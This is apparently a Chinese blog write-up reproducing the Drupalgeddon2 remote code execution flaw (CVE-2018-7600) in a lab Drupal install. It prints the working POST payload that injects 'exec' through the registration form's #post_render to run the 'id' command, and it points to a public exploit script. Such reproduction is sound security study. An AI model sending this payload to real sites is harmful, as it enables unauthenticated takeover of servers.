Drupal-CVE-2018-7600漏洞复现

本文详细介绍了Drupal CMS的Drupalgeddon2漏洞(CVE-2018-7600),这是一个影响Drupal 6/7/8版本的严重远程代码执行漏洞。由于FormAPI AJAX请求的输入验证不足,攻击者可以注入恶意负载,实现未授权的代码执行,从而完全控制受影响的Drupal站点。通过利用此漏洞,攻击者可以在不需用户认证的情况下执行任意命令。文中还展示了如何利用该漏洞,包括设置环境、安装Drupal、模拟攻击过程,并给出了利用代码的示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 # Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)

Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行漏洞,Drupal 对 Form API (FAPI) AJAX 请求的输入卫生不足。 结果,这使攻击者能够潜在地将恶意负载注入到内部表单结构中。 这将导致 Drupal 在没有用户身份验证的情况下执行它。 通过利用此漏洞,攻击者将能够对任何 Drupal 客户进行完整的站点接管。

启动环境之后,浏览器进行访问,看到是drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。

 

安装完成之后是这样的

接下来进行漏洞利用,参考https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py,通过bp抓包,直接抓取这个页面的数据包(安装完drupal是登录状态的话需退出登录才能访问到这个页面)

 

 然后添加post请求数据

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

 可以看到id命令被成功执行

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值